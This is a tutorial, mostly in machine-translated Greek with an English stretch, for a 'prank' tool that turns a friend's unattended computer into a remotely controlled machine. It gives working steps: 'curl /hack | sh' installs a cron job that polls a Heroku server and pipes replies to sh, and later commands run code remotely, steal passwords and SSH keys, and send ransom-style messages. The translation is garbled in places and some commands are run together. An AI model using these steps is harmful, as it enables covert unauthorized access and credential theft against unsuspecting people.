Πώς να χαράξετε τους φίλους σας

Οι φίλοι μου αφήνουν συχνά τους υπολογιστές τους ανοιχτούς και ξεκλείδωτους. Τους λέω ότι θα πρέπει πιθανώς να συνηθίσουν να κλειδώνουν τους υπολογιστές τους, αλλά δεν με ακούνε. Έτσι δημιούργησα ένα απλό έργο για να χαράξω τους φίλους μου και να τους δείξω τη σημασία της ασφάλειας του υπολογιστή.

Το μόνο που πρέπει να κάνω είναι να περιμένω να αφήσουν τον υπολογιστή τους ξεκλειδωμένο για λίγα δευτερόλεπτα, να ανοίξουν το τερματικό τους και να πληκτρολογήσουν μια, σύντομη εντολή.

Αυτό είναι! Ο υπολογιστής τους έχει πλέον μολυνθεί και μπορώ να εκτελέσω τις εντολές που θέλω σε αυτόν τον υπολογιστή από απόσταση. Πολύ γλυκό, σωστά; Ή ίσως σοκαριστικό;

Η εισβολή είναι παράνομη. ΕΙΔΙΚΑ:

«Σκόπιμη πρόσβαση σε υπολογιστή χωρίς άδεια ή υπέρβαση [εξουσιοδοτημένη] πρόσβαση» - Ο νόμος περί απάτης και κατάχρησης υπολογιστών (18 USC 1030)

Λάβετε λοιπόν υπόψη ότι ο σκοπός αυτού του άρθρου είναι να σας δείξει πόσο εύκολο θα ήταν για κάποιον με κακές προθέσεις να σας χαράξει, ώστε να αποφύγετε τον εαυτό σας.

Δεν χρειάζεται λίγη ιδιοφυΐα χάκερ για να καταστρέψει τη ζωή σας - κάθε «σενάριο παιδάκι» που μπορεί να αποκτήσει φυσική πρόσβαση στον υπολογιστή σας μπορεί να σας θέσει σε κίνδυνο κατεβάζοντας ένα σενάριο που περιέχει μόνο 50 γραμμές κώδικα.

Λήψη ρύθμισης

Όλος ο κώδικας για αυτό το έργο ζει σε αυτό το αποθετήριο εάν θέλετε να μεταβείτε δεξιά, αλλά θα σας εξηγήσω πώς λειτουργεί όλα παρακάτω.

Αρχικά, πρέπει απλώς να κλωνοποιήσετε το repo, να εγκαταστήσετε τις εξαρτήσεις του και να συνδέσετε το εργαλείο διεπαφής γραμμής εντολών hack (CLI).

git clone //github.com/ccorcos/hack.gitgit remote remove origincd hacknpm installnpm link

Στη συνέχεια, πρέπει να ρυθμίσετε το Heroku για να φιλοξενήσει τα σενάρια που θα εκτελούνται στον υπολογιστή σας. Εάν δεν έχετε χρησιμοποιήσει ποτέ το Heroku στο παρελθόν, εγγραφείτε εδώ (είναι δωρεάν!) Και ρυθμίστε το εργαλείο CLI στο μηχάνημά σας.

brew install heroku-toolbeltheroku login

Τώρα μέσα στο hack repo, δημιουργήστε μια εφαρμογή Heroku με ένα εύκολο όνομα που θυμάται. Χρησιμοποιώ hacker-chet.

heroku create hacker-chet

Τότε πρέπει να εκτελέσετε μια εντολή για να κάνετε μια μικρή εγκατάσταση. Το μόνο που πραγματικά κάνει είναι να πάρει τη ρίζα url για την ιστοσελίδα σας Heroku και τη θέση σου στην package.json . Με αυτόν τον τρόπο ο διακομιστής μπορεί να εισάγει τη διεύθυνση URL της εφαρμογής στα σενάρια του κελύφους.

npm run init

Μπορείτε να εκκινήσετε τον διακομιστή τοπικά εάν θέλετε να χαράξετε τον εαυτό σας και να δοκιμάσετε τα πράγματα.

npm start

Ή μπορείτε να αναπτύξετε στο Heroku.

npm run deploy

Τώρα είστε έτοιμοι να κάνετε hack!

API Hack

Η ομορφιά αυτού του προγράμματος είναι ότι για να ξεκινήσετε να πειράζετε κάποιον, απλά πρέπει να εκτελέσετε μια εντολή στον υπολογιστή του.

curl /hack | sh

Το ROOT_URL είναι η συγκεκριμένη διαδρομή για την εφαρμογή σας. Όταν εκτελείτε τον διακομιστή τοπικά, αυτό θα είναι localhost: 5000 και όταν αναπτύσσετε στο Heroku, θα είναι κάτι σαν .herokua pp.com.

Αυτό που κάνει είναι να δημιουργήσει μια εργασία cron - μια «χρονολογική δουλειά» που εκτελεί εργασίες σε συγκεκριμένες ώρες - για να κάνετε ping στο / env / live endpoint κάθε λεπτό και να διοχετεύει το αποτέλεσμα σε sh . Είναι πραγματικά πολύ απλό! Και η Heroku σας δίνει HTTPS δωρεάν, έτσι είναι «ασφαλές», σωστά;

Μόλις παραβιάσετε τον φίλο σας, μπορείτε να κάνετε οτιδήποτε άλλο με το εργαλείο γραμμής εντολών από τον υπολογιστή σας.

Το εργαλείο χακαρίσματος έχει μια έννοια διαφορετικών παραβιασμένων περιβαλλόντων. Όταν κάνετε hack κάποιον χρησιμοποιώντας το / hack endpoint, το άτομο ξεκινά στο ζωντανό περιβάλλον. Και για κάθε περιβάλλον, μπορείτε να εκτελέσετε μια ποικιλία διαφορετικών εντολών. Θα δείξω τα πάντα με λίγη αναδρομή.

Τα ακόλουθα θα ξαναγράψουν το σενάριο κελύφους ζωντανού περιβάλλοντος για να εκτελέσουν την ακόλουθη εντολή που θα λέει δυνατά «Σας παρακολουθώ».

hack live exec "say 'I\'m watching you'"

Λοιπόν, δεν πρόκειται να λειτουργήσει ακόμα, πρέπει ακόμη να επανατοποθετήσετε στην εφαρμογή Heroku.

hack deploy

Τώρα περιμένετε το επόμενο λεπτό και παρακολουθήστε τον υπολογιστή του φίλου σας να κάνει ping στον διακομιστή σας, ακολουθώντας τα αρχεία καταγραφής του διακομιστή.

hack logs

Το βασικό σημείο των περιβαλλόντων είναι έτσι ώστε να μπορείτε να χαράζετε πολλά άτομα ταυτόχρονα. Για να απομονώσετε άτομα σε διαφορετικά περιβάλλοντα, απλά πρέπει να αλλάξετε το όνομα.

hack live rename jon

Την επόμενη φορά που θα γίνει ping το ζωντανό περιβάλλον, θα ξαναγράψει τη δουλειά του cron για να ξεκινήσει ping το περιβάλλον jon .

Μπορείτε να κάνετε τα πάντα το ίδιο αλλάζοντας το επιχείρημα περιβάλλοντος.

hack jon exec "say 'hello jon'"

Τώρα αν είχατε αρκετή διασκέδαση για την ημέρα και το πάρτι τελείωσε, μπορείτε να ξεχάσετε τον Jon και να τον διαβεβαιώσετε ότι τον έχετε «ξεκλειδώσει».

hack jon forget

Αυτό θα διαγράψει την εργασία cron από τον υπολογιστή τους. Εναλλακτικά, ίσως θέλετε να βάλετε αυτό το περιβάλλον σε κατάσταση αναστολής κυττάρων, ώστε να μπορείτε να το ανακτήσετε αργότερα

hack jon interval 1d

Now, rather than pinging your server every minute (the default), it will ping every day at midnight. And when you want to wake it back up, you can change the interval back to every minute and the next day, you’re good to go!

hack jon interval 1m

Some other fun things to do are setting up additional cron jobs. Here’s how you can wake your friend up at 6am every morning to remind him about computer security.

hack jon cron "0 6 * * * say 'good morning jon, remember what I told you about locking your computer?'"

P.S. If you don’t remember how cron jobs work, this is a great resource. It pretty much all comes down to this little diagram.

* * * * *| | | | || | | | || | | | +---- Day of the Week (range: 1-7, 1 standing for Monday)| | | +------ Month of the Year (range: 1-12)| | +-------- Day of the Month (range: 1-31)| +---------- Hour (range: 0-23)+------------ Minute (range: 0-59)

One of my favorites is the desktop preset which will download an image from a given URL and set it as the background photo.

hack jon preset desktop //i.imgur.com/5FC2r9R.jpg

And if you’ve written a ton of cron jobs and you don’t know what’s on there anymore, you can use the dump command.

hack jon dump "crontab -l"

Τώρα ανοίξτε τα αρχεία καταγραφής σας και θα δείτε την έξοδο στο επόμενο ping. Αυτό είναι πραγματικά πολύ πιο απαίσιο τώρα που μπορείτε να λάβετε πληροφορίες. Αν θέλετε να είστε πιο άσεμνοι, μπορείτε να αναζητήσετε αποκρυπτογραφημένους κωδικούς πρόσβασης ή να κλέψετε τα κλειδιά τους

hack jon preset passwordshack jon preset ssh

Αλλά αν θέλετε απλά να του δώσετε έναν καλό ντεμοντέ τρόμο, στείλτε του ένα μήνυμα λύτρων!

hack jon preset ransom "Hello Jon, I told you not to leave your computer unlocked."

Τέλος, εάν βρεθείτε να προσθέτετε πολλές δουλειές cron και θέλετε απλώς να ξεκινήσετε ξανά, η επαναφορά είναι εδώ για να σας βοηθήσει.

hack jon reset

Τώρα διασκεδάστε (υπεύθυνος) με αυτό το πράγμα και επιτρέψτε μου να ξέρω ποιες είναι οι αγαπημένες σας φάρσες υποβάλλοντας ένα αίτημα τραβήγματος με μια νέα εντολή ή μια προκαθορισμένη ρύθμιση!

Καλές εισβολές!